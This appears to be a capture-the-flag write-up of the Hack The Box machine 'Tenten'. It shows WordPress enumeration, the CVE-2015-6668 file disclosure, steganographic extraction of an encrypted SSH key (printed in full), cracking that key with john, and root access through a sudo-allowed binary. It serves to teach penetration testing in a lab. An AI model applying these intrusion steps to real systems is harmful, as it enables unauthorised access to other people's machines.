--- search: exclude: true --- # Tenten Writeup ![](img/3.png) ## Introduction : Tenten is a medium linux box released back in March 2017. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. λ nihilist [ 10.10.14.20/23 ] [~] → nmap -F 10.10.10.10 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:20 GMT Nmap scan report for 10.10.10.10 Host is up (0.100s latency). Not shown: 98 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 3.36 seconds λ nihilist [ 10.10.14.20/23 ] [~] → nmap -sCV -p22,80 10.10.10.10 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:21 GMT Nmap scan report for 10.10.10.10 Host is up (0.10s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA) | 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA) |_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.7.3 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Job Portal - Just another WordPress site Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up wordpress running on port 80 : let's run WPScan to enumerate it further : ![](prg/3_001.png) λ nihilist [ 10.10.14.20/23 ] [~] → wpscan --url http://10.10.10.10/ -e _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.8 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://10.10.10.10/ [+] Started: Fri Feb 21 15:25:37 2020 Interesting Finding(s): [+] http://10.10.10.10/ | Interesting Entry: Server: Apache/2.4.18 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://10.10.10.10/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://10.10.10.10/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://10.10.10.10/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06). | Found By: Rss Generator (Passive Detection) | - http://10.10.10.10/index.php/feed/, https://wordpress.org/?v=4.7.3 | - http://10.10.10.10/index.php/comments/feed/, https://wordpress.org/?v=4.7.3 [+] WordPress theme in use: twentyseventeen | Location: http://10.10.10.10/wp-content/themes/twentyseventeen/ | Last Updated: 2019-05-07T00:00:00.000Z | Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.2 | Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1' [+] Enumerating Vulnerable Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] No plugins Found. [+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:07 <======================================> (324 / 324) 100.00% Time: 00:00:07 [+] Checking Theme Versions (via Passive and Aggressive Methods) [i] No themes Found. [+] Enumerating Timthumbs (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:55 <====================================> (2575 / 2575) 100.00% Time: 00:00:55 [i] No Timthumbs Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <=========================================> (21 / 21) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Enumerating DB Exports (via Passive and Aggressive Methods) Checking DB Exports - Time: 00:00:00 <=============================================> (36 / 36) 100.00% Time: 00:00:00 [i] No DB Exports Found. [+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected) Brute Forcing Attachment IDs - Time: 00:00:02 <==================================> (100 / 100) 100.00% Time: 00:00:02 [i] No Medias Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <========================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] takis | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page;=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Fri Feb 21 15:26:54 2020 [+] Requests Done: 3082 [+] Cached Requests: 40 [+] Data Sent: 762.012 KB [+] Data Received: 707.953 KB [+] Memory used: 209.004 MB [+] Elapsed time: 00:01:17 Looking at the results , we see that our scan picked up the usernames : takis and user1, let's head over to the website, clicking on the "jobs listing tab" ![](prg/3_002.png) Here we see that we are looking at what seems to be the page indexed 8, so let's see if we can list every page to see if we can find any irregularities λ nihilist [ 10.10.14.20/23 ] [~] → for i in $(seq 1 15); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<****title>'; done 1: <****title>Job Application: Hello world! - Job Portal<****/title> 2: <****title>Job Application: Sample Page - Job Portal<****/title> 3: <****title>Job Application: Auto Draft - Job Portal<****/title> 4: <****title>Job Application - Job Portal<****/title> 5: <****title>Job Application: Jobs Listing - Job Portal<****/title> 6: <****title>Job Application: Job Application - Job Portal<****/title> 7: <****title>Job Application: Register - Job Portal<****/title> 8: <****title>Job Application: Pen Tester - Job Portal<****/title> 9: <****title>Job Application: - Job Portal<****/title> 10: <****title>Job Application: Application - Job Portal<****/title> 11: <****title>Job Application: cube - Job Portal<****/title> 12: <****title>Job Application: Application - Job Portal<****/title> 13: <****title>Job Application: HackerAccessGranted - Job Portal<****/title> 14: <****title>Job Application - Job Portal<****/title> 15: <****title>Job Application - Job Portal<****/title> Looks like we have something odd at the index 13, which could indicate an outdated wordpress plugin vulnerability : [CVE-2015-6668](https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/) Which details how one can access files at a certain url using the following syntax **/wp-content/uploads/%year%/%month%/%filename%** λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg --2020-02-21 15:40:29-- http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg Connecting to 10.10.10.10:80... connected. HTTP request sent, awaiting response... 200 OK Length: 262408 (256K) [image/jpeg] Saving to: ‘HackerAccessGranted.jpg’ HackerAccessGranted.jpg 100%[===============================================>] 256.26K 418KB/s in 0.6s 2020-02-21 15:40:29 (418 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408] λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → file HackerAccessGranted.jpg HackerAccessGranted.jpg: JPEG image data, JFIF standard 1.01, resolution (DPCM), density 29x29, segment length 16, baseline, precision 8, 1500x1001, components 3 Looking at the results, we seem to have downloaded a jpg file , but let's assume that this is no regular image, and it probably contains some information. Using steganography tools we discover the hidden data : λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → steghide extract -sf HackerAccessGranted.jpg Enter passphrase: wrote extracted data to "id_rsa". λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → file id_rsa id_rsa: PEM RSA private key λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → cat id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C /HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo 1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g 2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo 6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9 4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF 2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7 L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv 5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB 9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP -----END RSA PRIVATE KEY----- Looks like we extracted a private key ! although it is encrypted, so we'll use sshng2john and john to crack it and somehow guess it's passphrase. λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → curl -sk https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/sshng2john.py > sshng2john.py λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → python sshng2john.py id_rsa > id_rsa.encrypted λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → file id_rsa.encrypted id_rsa.encrypted: ASCII text, with very long lines λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt Created directory: /home/nihilist/.john Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status superpassword (id_rsa) Warning: Only 2 candidates left, minimum 4 needed for performance. 1g 0:00:00:09 DONE (2020-02-21 15:46) 0.1006g/s 1442Kp/s 1442Kc/s 1442KC/sa6_123..*7¡Vamos! Session completed and it was quick ! the password was at the beginning of rockyou.txt : superpassword , now let's use it to log into the machine : λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → chmod 600 id_rsa λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen] → ssh -i id_rsa takis@10.10.10.10 Enter passphrase for key 'id_rsa': Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 65 packages can be updated. 39 updates are security updates. Last login: Fri May 5 23:05:36 2017 takis@tenten:~$ whoami takis takis@tenten:~$ cat /home/takis/user.txt e5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it ! we have been able to print out the user password. ## **Part 3 : Getting Root Access** In order to privesc we check if we can execute any binary as root without passwords using sudo -l takis@tenten:~$ cat /root/root.txt cat: /root/root.txt: Permission denied takis@tenten:~$ sudo -l Matching Defaults entries for takis on tenten: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User takis may run the following commands on tenten: (ALL : ALL) ALL (ALL) NOPASSWD: /bin/fuckin looks like we have a candidate named fuckin , let's see if we can execute commands as root : takis@tenten:~$ fuckin id uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) takis@tenten:~$ sudo fuckin id uid=0(root) gid=0(root) groups=0(root) And we were right , we can execute commands as root, let's print out the root flag : takis@tenten:~$ sudo fuckin cat /root/root.txt f9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it ! we have been able to print out the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/3_graph.png)